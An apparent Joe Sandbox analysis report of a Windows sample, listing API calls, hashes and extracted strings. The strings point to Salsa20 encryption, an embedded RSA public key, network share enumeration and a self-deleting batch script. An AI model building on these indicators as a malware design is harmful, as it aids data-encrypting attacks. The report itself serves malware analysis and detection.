                                                                                                                            • Instruction ID: 078e5a2934cbd84971401e251856dd4db301e707a41f40566b42731f595d4079
                                                                                                                            • Opcode Fuzzy Hash: 2c545b1fec7d90c27ff4b83ce1be4cc37c5c656f327c660adca26681e08ebe91
                                                                                                                            • Instruction Fuzzy Hash: 5931C5B1A00A05DBCB20DF68C5816AFB7EAEB46710F21863FE459D7780DB389D058795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004767E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 120817956-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004765C5
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00473C40: _memset.LIBCMT ref: 00473C83
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004728AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800726579-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0047CC83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 0047FA25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00470BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00470C12
                                                                                                                            • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0047FDA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumMessageOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1835186980-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00589230), ref: 0047FDD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: e2a35ef3c307a2c1796c841000d70cd0b66a832eaa07bdb067f984f0af64a2d3
                                                                                                                            • Instruction ID: c46b30a9cf69165d5a5d98d9a1242e4d0fb8873b8a882001747d598d1f0728ce
                                                                                                                            • Opcode Fuzzy Hash: e2a35ef3c307a2c1796c841000d70cd0b66a832eaa07bdb067f984f0af64a2d3
                                                                                                                            • Instruction Fuzzy Hash: ACD0A93138830537E3100BA4AC03F593A889B28B00F404026BA0AE80E0DAA1A024AA1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __fsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3646066109-0
                                                                                                                            • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction ID: 98e4cb081be4c3c2b639beb8b7224fbf837d07da3fd8144b75e897653238e8c5
                                                                                                                            • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                            • Instruction Fuzzy Hash: 64B0927244020C77CF012E82EC02A493B1D9B50764F048022FF0C18171EABBE6659789
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 00487F47
                                                                                                                              • Part of subcall function 00487E0E: __lock.LIBCMT ref: 00487E1C
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(00567B08,0000001C,00487CFB,00000000,00000001,00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E5B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E6C
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E85
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(-00000004,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E95
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487E9B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487EB1
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00487C49,000000FF,?,00488B1A,00000011,00000000,?,004850D7,0000000D), ref: 00487EBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2158581194-0
                                                                                                                            • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction ID: cd31fe6ccee1c9104b14018fc3f0cb71c832b62b837260db633732b656dada53
                                                                                                                            • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction Fuzzy Hash: B8B0927198420832DA113642AC03B193A085740A54F200061BA0C185A1A592A96041C9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction ID: ee55c5931efa4d6eb966c951fa53b3a32acd3fbe15ea03dccac393aa7087a806
                                                                                                                            • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                            • Instruction Fuzzy Hash: E5B0927244020C77CE012A86EC02A493B1D9B426A8F008022FB0C18572A677A6A19A89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 004982B9
                                                                                                                            • _wcscmp.LIBCMT ref: 004982CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00498568,?,00000000), ref: 004982E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00498568,?,00000000), ref: 00498310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction ID: f09221e07787fd6ed1a268f831bd9814c4459e4777eefef0877f2679f2b83973
                                                                                                                            • Opcode Fuzzy Hash: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction Fuzzy Hash: 2C01AD32240515AADF209F5CDC45F9A3F98AF06BA4F10807AF904DA152EF34DA41C7CC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P, xrefs: 00479EC4
                                                                                                                            • p2W, xrefs: 00479EE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$p2W
                                                                                                                            • API String ID: 2102423945-374934728
                                                                                                                            • Opcode ID: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction ID: 816fc5adc046c836e003117ccb53362a93c6c62e7184d3277b519f31c51fdba7
                                                                                                                            • Opcode Fuzzy Hash: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction Fuzzy Hash: 4DF0393828874069F3106790BC0BB297E81A334F18F044048E60C2A2F3D7ED228CB3DE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0046C090
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 0046C095
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction ID: a55f87971629810a1491c9fb319ad9f1b3725c102d4007a170b48d151e7ca282
                                                                                                                            • Opcode Fuzzy Hash: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction Fuzzy Hash: 4DC19DB5E002499FCB54CFA9C881AEEBBF0FF48300F24856AD859E7301E334AA458B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00472509
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00472539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00472550
                                                                                                                            • GetLastError.KERNEL32 ref: 0047255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047256E
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            • Opcode ID: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction ID: 5f88596263c58d6bad05855d18bb1be5ee0e1cb815ecbd1d66e99a0c13f0a4f3
                                                                                                                            • Opcode Fuzzy Hash: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction Fuzzy Hash: 36717D72900218AADF209BA0EC89FEE7BACFF55311F004596F609D2191DF759A8DDF60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 00471915
                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00471932
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471941
                                                                                                                            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471948
                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00471956
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00471962
                                                                                                                            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00471974
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 0047198B
                                                                                                                            • lstrcatW.KERNEL32(00000000,00560260), ref: 00471993
                                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 00471999
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004719A3
                                                                                                                            • _memset.LIBCMT ref: 004719B8
                                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004719DC
                                                                                                                              • Part of subcall function 00472BA0: lstrlenW.KERNEL32(?), ref: 00472BC9
                                                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00471A01
                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00471A04
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                            • String ID: failed with error
                                                                                                                            • API String ID: 4182478520-946485432
                                                                                                                            • Opcode ID: e4f8c01c8f34220a4ad81851d7d90a0cdd97da867090419ad5fb31cf66cd4847
                                                                                                                            • Instruction ID: c3d05608617cfb244bf91d4584eea3445703bce539c14a0e9f44951c10bbaee4
                                                                                                                            • Opcode Fuzzy Hash: e4f8c01c8f34220a4ad81851d7d90a0cdd97da867090419ad5fb31cf66cd4847
                                                                                                                            • Instruction Fuzzy Hash: A6212B71640214B7D7206B618C4AFAE3E78EF56B10F104055FB05B2191CE741E46EBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B49A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                              • Part of subcall function 004B49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                              • Part of subcall function 004B49A0: GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                              • Part of subcall function 004B49A0: GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                              • Part of subcall function 004B49A0: GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                              • Part of subcall function 004B49A0: _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004E2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004E2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 004E2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004E2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004E234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004E235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004E236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004E23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 004E23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004E2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004E243D
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E2450
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 96c7fe7304d8cc941dee6d35ac060c67d4f2517c5dbbd9400cf98f79edfb5be0
                                                                                                                            • Instruction ID: a7f733731121fea7d785b09f5da35ba2d971b456535f3806dcbf7ece69462c6d
                                                                                                                            • Opcode Fuzzy Hash: 96c7fe7304d8cc941dee6d35ac060c67d4f2517c5dbbd9400cf98f79edfb5be0
                                                                                                                            • Instruction Fuzzy Hash: 1741E731904300ABD3209B759C4AF2FBFF8FF86714F00051EFA54962A2E7B598059BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
